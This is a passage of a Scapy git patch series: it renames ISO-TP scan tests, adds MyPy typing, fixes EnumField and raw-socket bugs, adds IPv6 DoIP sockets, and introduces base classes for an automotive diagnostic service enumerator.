ISOTPScan(scansock, range(0x607, 0x60A), - can_interface=socks_interface, - sniff_time=sniff_time, - noise_listen_time=sniff_time * 6, - verbose=True) + result = isotp_scan(scansock, range(0x607, 0x60A), + can_interface=socks_interface, + sniff_time=sniff_time, + noise_listen_time=sniff_time * 6, + verbose=True) result = sorted(result, key=lambda x: x.src) with new_can_socket0() as cans: cans.send(CAN(identifier=0x609, data=b'\x01\xaa')) @@ -556,13 +556,13 @@ def test_extended_isotpscan_none(sniff_time=0.02): with new_can_socket0() as socks_interface: thread_noise.start() with new_can_socket0() as scansock: - result = ISOTPScan(scansock, range(0x5ff, 0x603 + 1), - extended_scan_range=range(0x20, 0x30), - extended_addressing=True, - can_interface=socks_interface, - sniff_time=sniff_time, - noise_listen_time=sniff_time * 6, - verbose=True) + result = isotp_scan(scansock, range(0x5ff, 0x603 + 1), + extended_scan_range=range(0x20, 0x30), + extended_addressing=True, + can_interface=socks_interface, + sniff_time=sniff_time, + noise_listen_time=sniff_time * 6, + verbose=True) result = sorted(result, key=lambda x: x.src) with new_can_socket0() as cans: cans.send(CAN(identifier=0x602, data=b'\x22\x01\xaa')) @@ -621,11 +621,11 @@ def test_isotpscan_none_random_ids(sniff_time=0.02): with new_can_socket0() as socks_interface: thread_noise.start() with new_can_socket0() as scansock: - result = ISOTPScan(scansock, range(0x001, 0x51), - can_interface=socks_interface, - noise_listen_time=sniff_time * 6, - sniff_time=sniff_time, - verbose=True) + result = isotp_scan(scansock, range(0x001, 0x51), + can_interface=socks_interface, + noise_listen_time=sniff_time * 6, + sniff_time=sniff_time, + verbose=True) result = sorted(result, key=lambda x: x.src) with new_can_socket0() as cans: for i in ids: @@ -676,11 +676,11 @@ def test_isotpscan_none_random_ids_padding(sniff_time=0.02): with new_can_socket0() as socks_interface: thread_noise.start() with new_can_socket0() as scansock: - result = ISOTPScan(scansock, range(0x001, 0x51), - can_interface=socks_interface, - noise_listen_time=sniff_time * 6, - sniff_time=sniff_time, - verbose=True) + result = isotp_scan(scansock, range(0x001, 0x51), + can_interface=socks_interface, + noise_listen_time=sniff_time * 6, + sniff_time=sniff_time, + verbose=True) result = sorted(result, key=lambda x: x.src) with new_can_socket0() as cans: for i in ids: @@ -718,51 +718,51 @@ test_dynamic(test_scan) test_dynamic(test_scan_extended) -= Test ISOTPScan(output_format=text) += Test isotp_scan(output_format=text) test_dynamic(test_isotpscan_text) -= Test ISOTPScan with padding (output_format=text) += Test isotp_scan with padding (output_format=text) test_dynamic(test_isotpscan_text_padding) -= Test ISOTPScan(output_format=text) extended_can_id += Test isotp_scan(output_format=text) extended_can_id test_dynamic(test_isotpscan_text_extended_can_id) -= Test ISOTPScan(output_format=code) += Test isotp_scan(output_format=code) test_dynamic(test_isotpscan_code) -= Test ISOTPScan with noise (output_format=code) += Test isotp_scan with noise (output_format=code) ~ disabled test_dynamic(test_isotpscan_code_noise) -= Test extended ISOTPScan(output_format=code) += Test extended isotp_scan(output_format=code) ~ disabled test_dynamic(test_extended_isotpscan_code) -= Test extended ISOTPScan(output_format=code) extended_can_id += Test extended isotp_scan(output_format=code) extended_can_id ~ disabled test_dynamic(test_extended_isotpscan_code_extended_can_id) -= Test ISOTPScan(output_format=None) += Test isotp_scan(output_format=None) test_dynamic(test_isotpscan_none) -= Test ISOTPScan(output_format=None) 2 += Test isotp_scan(output_format=None) 2 test_dynamic(test_isotpscan_none_2) -= Test extended ISOTPScan(output_format=None) += Test extended isotp_scan(output_format=None) test_dynamic(test_extended_isotpscan_none) -= Test ISOTPScan(output_format=None) random IDs += Test isotp_scan(output_format=None) random IDs test_dynamic(test_isotpscan_none_random_ids) -= Test ISOTPScan(output_format=None) random IDs padding += Test isotp_scan(output_format=None) random IDs padding ~ disabled test_dynamic(test_isotpscan_none_random_ids_padding) @@ -776,14 +776,14 @@ assert cleanup_interfaces() = empty tests -from scapy.contrib.isotp import generate_code_output, generate_text_output +from scapy.contrib.isotp.isotp_scanner import generate_code_output, generate_text_output assert generate_code_output("", None) == "" assert generate_text_output("") == "No packets found." = get_isotp_fc -from scapy.contrib.isotp import get_isotp_fc +from scapy.contrib.isotp.isotp_scanner import get_isotp_fc # to trigger "noise_ids.append(packet.identifier)" a = [] From 12588ffb6902bfc2530621f5c5508edd8bd820fe Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 16 May 2021 04:20:19 +0200 Subject: [PATCH 0578/1632] Update MyPy stats --- .config/mypy/mypy_deployment_stats.py | 20 ++++++++++++++++---- 1 file changed, 16 insertions(+), 4 deletions(-) diff --git a/.config/mypy/mypy_deployment_stats.py b/.config/mypy/mypy_deployment_stats.py index 41e70f4e396..209a19cb73a 100644 --- a/.config/mypy/mypy_deployment_stats.py +++ b/.config/mypy/mypy_deployment_stats.py @@ -15,6 +15,7 @@ # Parse config file localdir = os.path.split(__file__)[0] +rootpath = os.path.abspath(os.path.join(localdir, '../../')) with io.open(os.path.join(localdir, "mypy_enabled.txt")) as fd: FILES = [l.strip() for l in fd.readlines() if l.strip() and l[0] != "#"] @@ -22,25 +23,28 @@ # Scan Scapy ALL_FILES = [ - "".join(x.partition("scapy/")[1:]) for x in - glob.iglob(os.path.join(localdir, '../../scapy/**/*.py'), recursive=True) + "".join(x.partition("scapy/")[2:]) for x in + glob.iglob(os.path.join(rootpath, 'scapy/**/*.py'), recursive=True) ] # Process +REMAINING = defaultdict(list) MODULES = defaultdict(lambda: (0, 0)) for f in ALL_FILES: - with open(os.path.join(localdir, '../../', f)) as fd: + with open(os.path.join(rootpath, f)) as fd: lines = len(fd.read().split("\n")) parts = f.split("/") if len(parts) > 2: mod = parts[1] else: - mod = "[main]" + mod = "[core]" e, l = MODULES[mod] if f in FILES: e += lines + else: + REMAINING[mod].append(f) l += lines MODULES[mod] = (e, l) @@ -51,3 +55,11 @@ print("**MyPy Support: %.2f%%**" % (ENABLED / TOTAL * 100)) for mod, dat in MODULES.items(): print("- `%s`: %.2f%%" % (mod, dat[0] / dat[1] * 100)) + +print() +COREMODS = REMAINING["[core]"] +if COREMODS: + print("Core modules still untypes:") + for mod in COREMODS: + print("- `%s`" % mod) + From fdfb7dcd10ab3e84ecfa7f0f10a87581d64dc3c4 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Sun, 16 May 2021 04:38:40 +0200 Subject: [PATCH 0579/1632] Enable typing when available --- .config/mypy/mypy_enabled.txt | 6 ++++- scapy/themes.py | 43 +++++++++++++++++++++++------------ 2 files changed, 33 insertions(+), 16 deletions(-) diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index 50d1c5a8ee6..ec38dc3ac4f 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -6,15 +6,18 @@ # CORE scapy/__init__.py +scapy/__main__.py +scapy/all.py +scapy/ansmachine.py scapy/arch/__init__.py scapy/arch/common.py scapy/arch/linux.py scapy/arch/unix.py -scapy/ansmachine.py scapy/asn1/mib.py scapy/base_classes.py scapy/compat.py scapy/config.py +scapy/consts.py scapy/dadict.py scapy/data.py scapy/error.py @@ -30,6 +33,7 @@ scapy/route6.py scapy/sendrecv.py scapy/sessions.py scapy/supersocket.py +scapy/themes.py scapy/utils.py scapy/utils6.py diff --git a/scapy/themes.py b/scapy/themes.py index a26234fffc5..4922bf8c4cb 100644 --- a/scapy/themes.py +++ b/scapy/themes.py @@ -16,8 +16,9 @@ from scapy.compat import ( Any, Callable, + List, Optional, - Union, + Tuple, ) @@ -53,13 +54,18 @@ class ColorTable: inv_map = {v[0]: v[1] for k, v in colors.items()} def __repr__(self): + # type: () -> str return "" def __getattr__(self, attr): + # type: (str) -> str return self.colors.get(attr, [""])[0] - def ansi_to_pygments(self, x): # Transform ansi encoded text to Pygments text # noqa: E501 + def ansi_to_pygments(self, x): # type: (str) -> str + """ + Transform ansi encoded text to Pygments text + """ for k, v in self.inv_map.items(): x = x.replace(k, " " + v) return x.strip() @@ -68,16 +74,19 @@ def ansi_to_pygments(self, x): # Transform ansi encoded text to Pygments text Color = ColorTable() -def create_styler(fmt=None, before="", after="", fmt2="%s"): - # type: (Optional[Any], str, str, str) -> Callable - def do_style(val, fmt=fmt, before=before, after=after, fmt2=fmt2): - # type: (Union[int, str], Optional[Any], str, str, str) -> str +def create_styler(fmt=None, # type: Optional[str] + before="", # type: str + after="", # type: str + fmt2="%s" # type: str + ): + # type: (...) -> Callable[[Any], str] + def do_style(val, fmt=fmt, fmt2=fmt2, before=before, after=after): + # type: (Any, Optional[str], str, str, str) -> str if fmt is None: - if not isinstance(val, str): - val = str(val) + sval = str(val) else: - val = fmt % val - return fmt2 % (before + val + after) + sval = fmt % val + return fmt2 % (before + sval + after) return do_style @@ -87,16 +96,18 @@ def __repr__(self): return "<%s>" % self.__class__.__name__ def __reduce__(self): + # type: () -> Tuple[type, Any, Any] return (self.__class__, (), ()) def __getattr__(self, attr): - # type: (str) -> Callable + # type: (str) -> Callable[[Any], str] if attr in ["__getstate__", "__setstate__", "__getinitargs__", "__reduce_ex__"]: raise AttributeError() return create_styler() def format(self, string, fmt): + # type: (str, str) -> str for style in fmt.split("+"): string = getattr(self, style)(string) return string @@ -108,7 +119,7 @@ class NoTheme(ColorTheme): class AnsiColorTheme(ColorTheme): def __getattr__(self, attr): - # type: (str) -> Callable + # type: (str) -> Callable[[Any], str] if attr.startswith("__"): raise AttributeError(attr) s = "style_%s" % attr @@ -251,7 +262,7 @@ class ColorOnBlackTheme(AnsiColorTheme): class FormatTheme(ColorTheme): def __getattr__(self, attr): - # type: (str) -> Callable + # type: (str) -> Callable[[Any], str] if attr.startswith("__"): raise AttributeError(attr) colfmt = self.__class__.__dict__.get("style_%s" % attr, "%s") @@ -363,7 +374,7 @@ def apply_ipython_style(shell): # default shell.colors = 'neutral' try: - get_ipython() + get_ipython() # type: ignore # This function actually contains tons of hacks color_magic = shell.magics_manager.magics["line"]["colors"] color_magic(shell.colors) @@ -394,9 +405,11 @@ def apply_ipython_style(shell): class ClassicPrompt(Prompts): def in_prompt_tokens(self, cli=None): + # type: (Any) -> List[Tuple[Any, str]] return [(Token.Prompt, prompt), ] def out_prompt_tokens(self): + # type: () -> List[Tuple[Any, str]] return [(Token.OutPrompt, ''), ] # Apply classic prompt style shell.prompts_class = ClassicPrompt @@ -405,6 +418,6 @@ def out_prompt_tokens(self): shell.highlighting_style_overrides = scapy_style # Apply if Live try: - get_ipython().refresh_style() + get_ipython().refresh_style() # type: ignore except NameError: pass From a19c9b2196e720aaf82e44e7f50946b96593f70b Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 14 May 2021 01:04:52 +0200 Subject: [PATCH 0580/1632] Fix regression: KeyError on EnumField --- scapy/fields.py | 5 +---- test/fields.uts | 30 ++++++++++++++---------------- 2 files changed, 15 insertions(+), 20 deletions(-) diff --git a/scapy/fields.py b/scapy/fields.py index ed6d3195248..34b2cb2261f 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -2348,10 +2348,7 @@ def any2i_one(self, pkt, x): # type: (Optional[Packet], Any) -> I if isinstance(x, str): if self.s2i: - try: - x = self.s2i[x] - except KeyError: - pass + x = self.s2i[x] elif self.s2i_cb: x = self.s2i_cb(x) return cast(I, x) diff --git a/test/fields.uts b/test/fields.uts index 875fdc1a2aa..5831ea07c71 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -932,9 +932,9 @@ fcb = EnumField('test', 0, ( def expect_exception(e, c): try: eval(c) - return False + assert False except e: - return True + assert True = EnumField.any2i_one @@ -960,8 +960,6 @@ assert(fcb.any2i_one(None, 'Bar') == 1) assert(fcb.any2i_one(None, 5) == 5) expect_exception(ValueError, 'fcb.any2i_one(None, "Baz")') -True - = EnumField.any2i ~ field enumfield @@ -996,15 +994,15 @@ True assert(f.i2repr_one(None, 0) == 'Foo') assert(f.i2repr_one(None, 1) == 'Bar') -expect_exception(KeyError, 'f.i2repr_one(None, 2)') +assert(f.i2repr_one(None, 2) == '2') assert(rf.i2repr_one(None, 0) == 'Foo') assert(rf.i2repr_one(None, 1) == 'Bar') -expect_exception(KeyError, 'rf.i2repr_one(None, 2)') +assert(rf.i2repr_one(None, 2) == '2') assert(lf.i2repr_one(None, 0) == 'Foo') assert(lf.i2repr_one(None, 1) == 'Bar') -expect_exception(KeyError, 'lf.i2repr_one(None, 2)') +assert(lf.i2repr_one(None, 2) == '2') assert(fcb.i2repr_one(None, 0) == 'Foo') assert(fcb.i2repr_one(None, 1) == 'Bar') @@ -1044,17 +1042,17 @@ True assert(f.i2repr(None, 0) == 'Foo') assert(f.i2repr(None, 1) == 'Bar') -expect_exception(KeyError, 'f.i2repr(None, 2)') +assert(f.i2repr(None, 2) == '2') assert(f.i2repr(None, [0, 1]) == ['Foo', 'Bar']) assert(rf.i2repr(None, 0) == 'Foo') assert(rf.i2repr(None, 1) == 'Bar') -expect_exception(KeyError, 'rf.i2repr(None, 2)') +assert(rf.i2repr(None, 2) == '2') assert(rf.i2repr(None, [0, 1]) == ['Foo', 'Bar']) assert(lf.i2repr(None, 0) == 'Foo') assert(lf.i2repr(None, 1) == 'Bar') -expect_exception(KeyError, 'lf.i2repr(None, 2)') +assert(lf.i2repr(None, 2) == '2') assert(lf.i2repr(None, [0, 1]) == ['Foo', 'Bar']) assert(fcb.i2repr(None, 0) == 'Foo') @@ -1105,9 +1103,9 @@ True def expect_exception(e, c): try: eval(c) - return False + assert False except e: - return True + assert True = CharEnumField tests initialization @@ -1144,9 +1142,9 @@ True def expect_exception(e, c): try: eval(c) - return False + assert False except e: - return True + assert True = XByteEnumField tests initialization @@ -1222,9 +1220,9 @@ True def expect_exception(e, c): try: eval(c) - return False + assert False except e: - return True + assert True = XShortEnumField tests initialization From 367a78a107ab5b9699902370ce3b7a87bb9cd081 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 20 May 2021 09:18:28 +0200 Subject: [PATCH 0581/1632] Fix ResourceWarning in L3RawSocket6 --- scapy/layers/inet6.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 03f931691b8..7ee7f58cd63 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -3364,10 +3364,10 @@ def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(), class L3RawSocket6(L3RawSocket): def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501 - L3RawSocket.__init__(self, type, filter, iface, promisc) # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) # noqa: E501 self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501 self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 + self.iface = iface def IPv6inIP(dst='203.178.135.36', src=None): From 5df4a1f131ef2404b11913712a95c2ea3d62b8bd Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 31 May 2021 00:03:18 +0200 Subject: [PATCH 0582/1632] Add IPv6 support for DoIP (#3223) * Add IPv6 support for DoIP * fix codacy * add typing --- scapy/contrib/automotive/doip.py | 85 +++++++++++++++++++++++++++----- 1 file changed, 72 insertions(+), 13 deletions(-) diff --git a/scapy/contrib/automotive/doip.py b/scapy/contrib/automotive/doip.py index dd6b1ea8327..57b53230b59 100644 --- a/scapy/contrib/automotive/doip.py +++ b/scapy/contrib/automotive/doip.py @@ -261,25 +261,71 @@ def __init__(self, ip='127.0.0.1', port=13400, activate_routing=True, self.ip = ip self.port = port self.source_address = source_address - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + self._init_socket() + + if activate_routing: + self._activate_routing( + source_address, target_address, activation_type) + + def _init_socket(self, sock_family=socket.AF_INET): + # type: (int) -> None + s = socket.socket(sock_family, socket.SOCK_STREAM) s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.connect((self.ip, self.port)) StreamSocket.__init__(self, s, DoIP) + def _activate_routing(self, + source_address, # type: int + target_address, # type: int + activation_type # type: int + ): # type: (...) -> None + resp = self.sr1( + DoIP(payload_type=0x5, activation_type=activation_type, + source_address=source_address), + verbose=False, timeout=1) + if resp and resp.payload_type == 0x6 and \ + resp.routing_activation_response == 0x10: + self.target_address = target_address or \ + resp.logical_address_doip_entity + print("Routing activation successful! " + "Target address set to: 0x%x" % self.target_address) + else: + print("Routing activation failed! Response: %s" % repr(resp)) + + +class DoIPSocket6(DoIPSocket): + """ Custom StreamSocket for DoIP communication over IPv6. + This sockets automatically sends a routing activation request as soon as + a TCP connection is established. + + :param ip: IPv6 address of destination + :param port: destination port, usually 13400 + :param activate_routing: If true, routing activation request is + automatically sent + :param source_address: DoIP source address + :param target_address: DoIP target address, this is automatically + determined if routing activation request is sent + :param activation_type: This allows to set a different activation type for + the routing activation request + + Example: + >>> socket = DoIPSocket6("2001:16b8:3f0e:2f00:21a:37ff:febf:edb9") + >>> pkt = DoIP(payload_type=0x8001, source_address=0xe80, target_address=0x1000) / UDS() / UDS_RDBI(identifiers=[0x1000]) + >>> resp = socket.sr1(pkt, timeout=1) + """ # noqa: E501 + def __init__(self, ip='::1', port=13400, activate_routing=True, + source_address=0xe80, target_address=0, + activation_type=0): + # type: (str, int, bool, int, int, int) -> None + self.ip = ip + self.port = port + self.source_address = source_address + super(DoIPSocket6, self)._init_socket(socket.AF_INET6) + if activate_routing: - resp = self.sr1( - DoIP(payload_type=0x5, activation_type=activation_type, - source_address=source_address), - verbose=False, timeout=1) - if resp and resp.payload_type == 0x6 and \ - resp.routing_activation_response == 0x10: - self.target_address = target_address or \ - resp.logical_address_doip_entity - print("Routing activation successful! " - "Target address set to: 0x%x" % self.target_address) - else: - print("Routing activation failed! Response: %s" % repr(resp)) + super(DoIPSocket6, self)._activate_routing( + source_address, target_address, activation_type) class UDS_DoIPSocket(DoIPSocket): @@ -316,6 +362,19 @@ def recv(self, x=MTU): return pkt +class UDS_DoIPSocket6(DoIPSocket6, UDS_DoIPSocket): + """ + Application-Layer socket for DoIP endpoints. This socket takes care about + the encapsulation of UDS packets into DoIP packets. + + Example: + >>> socket = UDS_DoIPSocket6("2001:16b8:3f0e:2f00:21a:37ff:febf:edb9") + >>> pkt = UDS() / UDS_RDBI(identifiers=[0x1000]) + >>> resp = socket.sr1(pkt, timeout=1) + """ + pass + + bind_bottom_up(UDP, DoIP, sport=13400) bind_bottom_up(UDP, DoIP, dport=13400) bind_layers(UDP, DoIP, sport=13400, dport=13400) From c9c0821def607b9c2be0f4b65b3cc06144a8b1fb Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 31 May 2021 00:05:12 +0200 Subject: [PATCH 0583/1632] Split of #3054: Implementation of Enumerator and Executor base classes (#3189) * Split of #3054: Implementation of Enumerator and Executor base classes --- .config/mypy/mypy_enabled.txt | 3 + scapy/contrib/automotive/ecu.py | 2 +- scapy/contrib/automotive/gm/gmlanutils.py | 4 +- .../automotive/scanner/configuration.py | 73 +- .../contrib/automotive/scanner/enumerator.py | 629 ++++++++++ scapy/contrib/automotive/scanner/executor.py | 338 ++++++ .../automotive/scanner/staged_test_case.py | 43 +- scapy/contrib/automotive/scanner/test_case.py | 24 +- scapy/contrib/automotive/uds.py | 4 +- scapy/contrib/cansocket_native.py | 6 +- scapy/utils.py | 11 +- test/contrib/automotive/enumerator.uts | 103 -- .../contrib/automotive/scanner/enumerator.uts | 1045 +++++++++++++++++ .../automotive/scanner/staged_test_case.uts | 40 +- 14 files changed, 2162 insertions(+), 163 deletions(-) create mode 100644 scapy/contrib/automotive/scanner/enumerator.py create mode 100644 scapy/contrib/automotive/scanner/executor.py delete mode 100644 test/contrib/automotive/enumerator.uts create mode 100644 test/contrib/automotive/scanner/enumerator.uts diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index ec38dc3ac4f..eb008e7787a 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -50,6 +50,8 @@ scapy/contrib/automotive/gm/gmlan_logging.py scapy/contrib/automotive/gm/gmlanutils.py scapy/contrib/automotive/kwp.py scapy/contrib/automotive/scanner/configuration.py +scapy/contrib/automotive/scanner/enumerator.py +scapy/contrib/automotive/scanner/executor.py scapy/contrib/automotive/scanner/graph.py scapy/contrib/automotive/scanner/staged_test_case.py scapy/contrib/automotive/scanner/test_case.py @@ -64,3 +66,4 @@ scapy/contrib/isotp/isotp_scanner.py scapy/contrib/isotp/isotp_soft_socket.py scapy/contrib/isotp/isotp_utils.py scapy/contrib/roce.py + diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index 7fabf705c39..2ac56ee6466 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -368,7 +368,7 @@ def supported_responses(self): to provide the best possible results, if this list of supported responses is used to simulate an real world Ecu with the EcuAnsweringMachine object. - :return: + :return: A sorted list of EcuResponse objects """ self.__supported_responses.sort(key=self.sort_key_func) return self.__supported_responses diff --git a/scapy/contrib/automotive/gm/gmlanutils.py b/scapy/contrib/automotive/gm/gmlanutils.py index b77cdd378ea..7f869448e4e 100644 --- a/scapy/contrib/automotive/gm/gmlanutils.py +++ b/scapy/contrib/automotive/gm/gmlanutils.py @@ -64,10 +64,12 @@ def __init__(self, sock, pkt=GMLAN(service="TesterPresent"), interval=2): def run(self): # type: () -> None - while not self._stopped.is_set(): + while not self._stopped.is_set() and not self._socket.closed: for p in self._pkts: self._socket.sr1(p, verbose=False, timeout=0.1) time.sleep(self._interval) + if self._stopped.is_set() or self._socket.closed: + break def GMLAN_InitDiagnostics( diff --git a/scapy/contrib/automotive/scanner/configuration.py b/scapy/contrib/automotive/scanner/configuration.py index eebd2b71f24..4c03c6bee5c 100644 --- a/scapy/contrib/automotive/scanner/configuration.py +++ b/scapy/contrib/automotive/scanner/configuration.py @@ -6,7 +6,7 @@ # scapy.contrib.description = AutomotiveTestCaseExecutorConfiguration # scapy.contrib.status = library -from scapy.compat import Any, Union, List, Type +from scapy.compat import Any, Union, List, Type, Set from scapy.contrib.automotive.scanner.graph import Graph from scapy.error import log_interactive from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCaseABC @@ -49,40 +49,55 @@ def __getitem__(self, key): # type: (Any) -> Any return self.__dict__[key] + def _generate_test_case_config(self, test_case_cls): + # type: (Type[AutomotiveTestCaseABC]) -> None + # try to get config from kwargs + if test_case_cls in self.test_case_clss: + return + + self.test_case_clss.add(test_case_cls) + + kwargs_name = test_case_cls.__name__ + "_kwargs" + self.__setattr__(test_case_cls.__name__, self.global_kwargs.pop( + kwargs_name, dict())) + + # apply global config + val = self.__getattribute__(test_case_cls.__name__) + for kwargs_key, kwargs_val in self.global_kwargs.items(): + if kwargs_key not in val.keys(): + val[kwargs_key] = kwargs_val + self.__setattr__(test_case_cls.__name__, val) + + def add_test_case(self, test_case): + # type: (Union[AutomotiveTestCaseABC, Type[AutomotiveTestCaseABC], StagedAutomotiveTestCase]) -> None # noqa: E501 + if isinstance(test_case, StagedAutomotiveTestCase): + self.stages.append(test_case) + for tc in test_case.test_cases: + self.staged_test_cases.append(tc) + self._generate_test_case_config(tc.__class__) + + if isinstance(test_case, AutomotiveTestCaseABC): + self.test_cases.append(test_case) + self._generate_test_case_config(test_case.__class__) + + if not isinstance(test_case, AutomotiveTestCaseABC): + self.test_cases.append(test_case()) + self._generate_test_case_config(test_case) + def __init__(self, test_cases, **kwargs): # type: (Union[List[Union[AutomotiveTestCaseABC, Type[AutomotiveTestCaseABC]]], List[Type[AutomotiveTestCaseABC]]], Any) -> None # noqa: E501 self.verbose = kwargs.get("verbose", False) self.debug = kwargs.get("debug", False) self.delay_state_change = kwargs.get("delay_state_change", 0.5) self.state_graph = Graph() - - # test_case can be a mix of classes or instances - self.test_cases = \ - [e() for e in test_cases if not isinstance(e, AutomotiveTestCaseABC)] # type: List[AutomotiveTestCaseABC] # noqa: E501 - self.test_cases += \ - [e for e in test_cases if isinstance(e, AutomotiveTestCaseABC)] - - self.stages = [e for e in self.test_cases - if isinstance(e, StagedAutomotiveTestCase)] - - self.staged_test_cases = \ - [i for sublist in [e.test_cases for e in self.stages] - for i in sublist] - - self.test_case_clss = set([ - case.__class__ for case in set(self.staged_test_cases + - self.test_cases)]) - - for cls in self.test_case_clss: - kwargs_name = cls.__name__ + "_kwargs" - self.__setattr__(cls.__name__, kwargs.pop(kwargs_name, dict())) - - for cls in self.test_case_clss: - val = self.__getattribute__(cls.__name__) - for kwargs_key, kwargs_val in kwargs.items(): - if kwargs_key not in val.keys(): - val[kwargs_key] = kwargs_val - self.__setattr__(cls.__name__, val) + self.test_cases = list() # type: List[AutomotiveTestCaseABC] + self.stages = list() # type: List[StagedAutomotiveTestCase] + self.staged_test_cases = list() # type: List[AutomotiveTestCaseABC] + self.test_case_clss = set() # type: Set[Type[AutomotiveTestCaseABC]] + self.global_kwargs = kwargs + + for tc in test_cases: + self.add_test_case(tc) log_interactive.debug("The following configuration was created") log_interactive.debug(self.__dict__) diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py new file mode 100644 index 00000000000..a71c5a424da --- /dev/null +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -0,0 +1,629 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Nils Weiss +# This program is published under a GPLv2 license + +# scapy.contrib.description = ServiceEnumerator definitions +# scapy.contrib.status = library + + +import abc +import time +from collections import defaultdict, OrderedDict +from itertools import chain + +from scapy.compat import Any, Union, List, Optional, Iterable, \ + Dict, Tuple, Set, Callable, cast, NamedTuple, orb +from scapy.error import Scapy_Exception, log_interactive +from scapy.utils import make_lined_table, EDecimal +import scapy.modules.six as six +from scapy.packet import Packet +from scapy.contrib.automotive.ecu import EcuState, EcuResponse +from scapy.contrib.automotive.scanner.test_case import AutomotiveTestCase, \ + StateGenerator, _SocketUnion, _TransitionTuple +from scapy.contrib.automotive.scanner.configuration import \ + AutomotiveTestCaseExecutorConfiguration +from scapy.contrib.automotive.scanner.graph import _Edge + + +# Definition outside the class ServiceEnumerator to allow pickling +_AutomotiveTestCaseScanResult = NamedTuple( + "_AutomotiveTestCaseScanResult", + [("state", EcuState), + ("req", Packet), + ("resp", Optional[Packet]), + ("req_ts", Union[EDecimal, float]), + ("resp_ts", Optional[Union[EDecimal, float]])]) + +_AutomotiveTestCaseFilteredScanResult = NamedTuple( + "_AutomotiveTestCaseFilteredScanResult", + [("state", EcuState), + ("req", Packet), + ("resp", Packet), + ("req_ts", Union[EDecimal, float]), + ("resp_ts", Union[EDecimal, float])]) + + +@six.add_metaclass(abc.ABCMeta) +class ServiceEnumerator(AutomotiveTestCase): + """ Base class for ServiceEnumerators of automotive diagnostic protocols""" + + def __init__(self): + # type: () -> None + super(ServiceEnumerator, self).__init__() + self.__result_packets = OrderedDict() # type: Dict[bytes, Packet] + self._results = list() # type: List[_AutomotiveTestCaseScanResult] + self._request_iterators = dict() # type: Dict[EcuState, Iterable[Packet]] # noqa: E501 + self._retry_pkt = None # type: Optional[Union[Packet, Iterable[Packet]]] # noqa: E501 + self._negative_response_blacklist = [0x10, 0x11] # type: List[int] + + @staticmethod + @abc.abstractmethod + def _get_negative_response_code(resp): + # type: (Packet) -> int + raise NotImplementedError() + + @staticmethod + @abc.abstractmethod + def _get_negative_response_desc(nrc): + # type: (int) -> str + raise NotImplementedError() + + def _get_table_entry_x(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return str(tup[0]) + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return repr(tup[1]) + + def _get_table_entry_z(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return repr(tup[2]) + + @staticmethod + @abc.abstractmethod + def _get_negative_response_label(response): + # type: (Packet) -> str + raise NotImplementedError() + + @abc.abstractmethod + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + raise NotImplementedError("Overwrite this method") + + def __reduce__(self): # type: ignore + f, t, d = super(ServiceEnumerator, self).__reduce__() # type: ignore + try: + del d["_request_iterators"] + except KeyError: + pass + + try: + del d["_retry_pkt"] + except KeyError: + pass + return f, t, d + + @property + def negative_response_blacklist(self): + # type: () -> List[int] + return self._negative_response_blacklist + + @property + def completed(self): + # type: () -> bool + if len(self._results): + return all([self.has_completed(s) for s in self.scanned_states]) + else: + return super(ServiceEnumerator, self).completed + + def _store_result(self, state, req, res): + # type: (EcuState, Packet, Optional[Packet]) -> None + if bytes(req) not in self.__result_packets: + self.__result_packets[bytes(req)] = req + + if res and bytes(res) not in self.__result_packets: + self.__result_packets[bytes(res)] = res + + self._results.append(_AutomotiveTestCaseScanResult( + state, + self.__result_packets[bytes(req)], + self.__result_packets[bytes(res)] if res is not None else None, + req.sent_time or 0.0, + res.time if res is not None else None)) + + def __get_retry_iterator(self): + # type: () -> Iterable[Packet] + if self._retry_pkt: + if isinstance(self._retry_pkt, Packet): + it = [self._retry_pkt] # type: Iterable[Packet] + else: + # assume self.retry_pkt is a generator or list + it = self._retry_pkt + return it + else: + return [] + + def __get_initial_request_iterator(self, state, **kwargs): + # type: (EcuState, Any) -> Iterable[Packet] + if state not in self._request_iterators: + self._request_iterators[state] = iter( + self._get_initial_requests(**kwargs)) + + return self._request_iterators[state] + + def __get_request_iterator(self, state, **kwargs): + # type: (EcuState, Optional[Dict[str, Any]]) -> Iterable[Packet] + return chain(self.__get_retry_iterator(), + self.__get_initial_request_iterator(state, **kwargs)) + 